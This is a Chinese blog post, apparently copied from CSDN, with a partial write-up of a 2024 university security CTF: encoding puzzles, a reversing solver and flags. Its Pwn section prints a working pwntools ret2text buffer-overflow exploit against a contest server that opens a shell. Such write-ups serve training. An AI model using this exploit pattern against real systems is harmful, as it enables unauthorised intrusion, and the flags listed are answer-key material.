码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 2024高校网络安全管理运维赛题目--复现+题目+wp


    比赛官网

    比赛官网

    部分writeup

    Signin
    如图所示GIF提取,然后简单的ROT13
    flag{welcome-to-signin-quiz}

    邮件
    ----如图所示简单的base64

    邮件flag{WeLCoMeto}

    邮箱flag{phishHUntInG}

    Babyre
    解析:放到IDA分析,看伪代码

    得到AncsA6gXMSMoMqIuNCMuxaYuAGIavC9=关键字符转
    分析得到是类似base64的加密但又不完全是
    写python代码对关键字符串处理,

    def reverse_alnum(input_str):
        result = []
        for char in input_str:
            if char.isalpha():
                # 大写字母A-Z替换为Z-A
                if char.isupper():
                    result.append(chr(90 - (ord(char) - 65)))
                # 小写字母a-z替换为z-a
                else:
                    result.append(chr(122 - (ord(char) - 97)))
            elif char.isdigit():
                # 数字1-9替换为9-1
                if char != '0':
                    result.append(str(9 - int(char) + 1))
                else:
                    result.append('0')  # 0保持不变
            else:
                # 非字母数字字符保持不变
                result.append(char)
        return ''.join(result)
    
    # 示例
    input_str = input("请输入一个包含英文字符和数字的字符串:")
    output_str = reverse_alnum(input_str)
    print("替换后的字符串为:", output_str)
    

    最后base64解密
    答案flag{B4se64_1s_s0_e4sy}

    在这里插入图片描述

    Pwn
    解释:看代码呀
    构造输入的内容溢出然后ret到后门函数(简单的ret2text)
    答案:flag{kOoD1EijiemeePh8IeNei2XOL8ich5de}

    from pwn import *
    #context(os='linux',arch='amd64',log_level='debug')
    #p=process('./pwn')
    elf=ELF('./pwn')
    libc = ELF('libc.so.6')
    p=remote("prob07.contest.pku.edu.cn",10007)
    #gdb.attach(p, 'b *0x40121d')
    
    bin_sh_address_chuancan=0x40117a
    
    
    ret = 0x40121e
    
    offset=0x78
    
    payload1=b'31:MEQCIHOFrdjB9js6X862TKy0BVBCbHCJyY9DFzfczTllh8GuAiA7m5orfJ0SRZt6xI_ZEE__jRp8V9V8YIP13k61RG9quw=='
    p.sendline(payload1)
    
    payload2=b'a'*offset + p64(bin_sh_address_chuancan)
    p.sendlineafter(b'Enter your username: ',payload2)
    p.sendline(payload2)
    #pause()
    p.interactive()
    

    在这里插入图片描述Gateway解析:
    找到这个文件 ,十进制的ASCII的转换
    答案:flag{ad1985868133e8cf1828cb84adbe5a5b}
    在这里插入图片描述

    题目资源

    题目资源

    有时间我再自己完全的做一遍,未完待续~

    答案当然是要最后看哒:

    官方writeup
    集思广益
    比较好的备份

  • 相关阅读:
    Java:线程状态及线程状态转换方法
    Swift Combine — Publisher、Operator、Subscriber概念介绍
    Wireshark下载、Wireshark使用、Wireshark抓包、ARP抓包、ICMP抓包、TCP抓包、HTTP抓包
    【以太网通信】MDIO 管理接口及控制器设计
    基于jsp+mysql+ssm学生网上请假系统-计算机毕业设计
    HTML中, 在同一行上出现高低不一样的文字,处理对齐效果
    Flutter中GetX系列八--GetUtils(正则判断)使用详情
    NIO讲解
    MongoDB - 事务支持
    药企速看?四川省药品上市许可持有人制度试点方案
  • 原文地址:https://blog.csdn.net/m0_64696290/article/details/139597887
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号